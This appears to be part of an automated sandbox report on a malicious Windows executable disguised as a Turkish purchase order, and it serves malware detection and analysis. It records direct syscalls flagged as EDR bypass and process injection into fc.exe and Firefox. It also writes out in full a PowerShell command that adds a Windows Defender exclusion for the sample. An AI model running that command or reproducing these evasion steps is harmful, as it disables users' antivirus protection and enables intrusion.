            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01910BCB mov eax, dword ptr fs:[00000030h]3_2_01910BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01910BCB mov eax, dword ptr fs:[00000030h]3_2_01910BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197CBF0 mov eax, dword ptr fs:[00000030h]3_2_0197CBF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191EBFC mov eax, dword ptr fs:[00000030h]3_2_0191EBFC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8BF0 mov eax, dword ptr fs:[00000030h]3_2_018F8BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8BF0 mov eax, dword ptr fs:[00000030h]3_2_018F8BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8BF0 mov eax, dword ptr fs:[00000030h]3_2_018F8BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196EB1D mov eax, dword ptr fs:[00000030h]3_2_0196EB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4B00 mov eax, dword ptr fs:[00000030h]3_2_019C4B00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191EB20 mov eax, dword ptr fs:[00000030h]3_2_0191EB20
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191EB20 mov eax, dword ptr fs:[00000030h]3_2_0191EB20
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B8B28 mov eax, dword ptr fs:[00000030h]3_2_019B8B28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B8B28 mov eax, dword ptr fs:[00000030h]3_2_019B8B28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199EB50 mov eax, dword ptr fs:[00000030h]3_2_0199EB50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h]3_2_019C2B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h]3_2_019C2B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h]3_2_019C2B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C2B57 mov eax, dword ptr fs:[00000030h]3_2_019C2B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A4B4B mov eax, dword ptr fs:[00000030h]3_2_019A4B4B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A4B4B mov eax, dword ptr fs:[00000030h]3_2_019A4B4B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986B40 mov eax, dword ptr fs:[00000030h]3_2_01986B40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986B40 mov eax, dword ptr fs:[00000030h]3_2_01986B40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BAB40 mov eax, dword ptr fs:[00000030h]3_2_019BAB40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01998B42 mov eax, dword ptr fs:[00000030h]3_2_01998B42
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8B50 mov eax, dword ptr fs:[00000030h]3_2_018E8B50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018ECB7E mov eax, dword ptr fs:[00000030h]3_2_018ECB7E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928A90 mov edx, dword ptr fs:[00000030h]3_2_01928A90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA80 mov eax, dword ptr fs:[00000030h]3_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4A80 mov eax, dword ptr fs:[00000030h]3_2_019C4A80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8AA0 mov eax, dword ptr fs:[00000030h]3_2_018F8AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8AA0 mov eax, dword ptr fs:[00000030h]3_2_018F8AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946AA4 mov eax, dword ptr fs:[00000030h]3_2_01946AA4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01924AD0 mov eax, dword ptr fs:[00000030h]3_2_01924AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01924AD0 mov eax, dword ptr fs:[00000030h]3_2_01924AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h]3_2_01946ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h]3_2_01946ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01946ACC mov eax, dword ptr fs:[00000030h]3_2_01946ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0AD0 mov eax, dword ptr fs:[00000030h]3_2_018F0AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192AAEE mov eax, dword ptr fs:[00000030h]3_2_0192AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192AAEE mov eax, dword ptr fs:[00000030h]3_2_0192AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197CA11 mov eax, dword ptr fs:[00000030h]3_2_0197CA11
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01914A35 mov eax, dword ptr fs:[00000030h]3_2_01914A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01914A35 mov eax, dword ptr fs:[00000030h]3_2_01914A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192CA24 mov eax, dword ptr fs:[00000030h]3_2_0192CA24
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191EA2E mov eax, dword ptr fs:[00000030h]3_2_0191EA2E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900A5B mov eax, dword ptr fs:[00000030h]3_2_01900A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900A5B mov eax, dword ptr fs:[00000030h]3_2_01900A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h]3_2_018F6A50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory written: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 7656Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
